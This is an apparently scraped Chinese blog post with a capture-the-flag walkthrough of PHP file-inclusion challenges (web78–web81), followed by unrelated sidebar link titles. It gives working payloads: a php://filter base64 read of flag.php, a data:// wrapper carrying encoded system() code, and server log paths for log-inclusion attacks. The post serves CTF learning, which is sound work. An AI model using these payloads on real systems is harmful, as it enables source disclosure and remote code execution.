当前位置:网站首页>showCTF 入门文件包含系列
showCTF 入门文件包含系列
2022-06-21 08:00:00 【旋风1+1】
- web78
读取源代码:
心想,就这?
直接:http://url地址/?file=flag.php,但是这样出不来,页面什么也没有,想着这毕竟是一个PHP文件,可能在我们包含的时候被服务器给解析了。所以我们必须要让它不解析,这里提供一种方法,PHP伪协议中的:php://filter
直接:
http://url地址/?file=php://filter/read/convert.base64-encode/resource=flag.php
成功获取flag.php的文件内容,在线网址解base64:
https://tool.oschina.net/encrypt?type=3
- web79
此题和也是利用PHP中的伪协议:
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=<-----base64-encode/decode-----> <?php system(‘cat flag.php’);
- web80
本题主要考察nginx服务器的日志文件包含,常见服务器日志文件位置:
nginx: /var/log/nginx/access.log
apache: /var/log/httpd/access_log
bp拦截:
- web81
此题和80题是一样的方法。
边栏推荐
- Rdkit | topological polarity surface area (TPSA)
- 图解 Google V8 # 16:V8是怎么通过内联缓存来提升函数执行效率的?
- 华三IPsec
- (for line breaks) differences between gets and fgets, and between puts and fputs
- 1005 Spell It Right (20 分)(测试点3)
- How can we make millions a year now?
- 1004 Counting Leaves (30 分)
- Haidilao is expected to have an annual net loss of 3.8 billion to 4.5 billion and close more than 300 stores
- 面试鸭 面试刷题 网站系统源码
- There was a GC failure in the online go service. I was in a hurry
猜你喜欢
How can we make millions a year now?
Traversal of binary tree
Is the index of nine interview sites of ten companies invalid?
為什呢代碼沒報錯但是數據庫裏邊的數據顯示不出來
图解 Google V8 # 15:隐藏类:如何在内存中快速查找对象属性?
虚拟机浏览器花屏空白问题
What is a multi domain SSL certificate?
33 Jenkins modify plug-in source
Scientific research information | national natural conclusion regulations: more than 50% of the fund balance or it will not be concluded
2021-06-16 STM32F103 EXTI 中斷識別 使用固件庫
随机推荐
Le Code est correct, mais les données de la base de données ne sont pas affichées.
An improvement of the code in the article "Walkthrough: creating paged data access using web form pages" in MSDN
Send using queue mailbox
运算符优先级与结合顺序
2021-07-28 STM32F103 I2C Hardware Transfer Include previous IO Clock EXIT USB use firmware library
[kotlin] first day
群暉DSM7添加套件源
Interview duck interview brush question website system source code
Traversal of binary tree
32 single chip microcomputer - PWM wave output
Why is there no error in the code, but the data in the database cannot be displayed
Global and Chinese market for crankshaft position sensors 2022-2028: Research Report on technology, participants, trends, market size and share
微信公众号对接 : 一键推送文章信息至公众号
unity裏現實攝像頭運鏡並LookAt到物體前方 基於Dotween
升级Jenkins步骤和遇到的问题
(for line breaks) differences between gets and fgets, and between puts and fputs
[Blue Bridge Cup monolithic unit] serial port communication
為什呢代碼沒報錯但是數據庫裏邊的數據顯示不出來
Blank screen of virtual machine browser
PostgreSQL database firstborn - background first-class citizen process startupdatabase startupxlog function enters recovery mode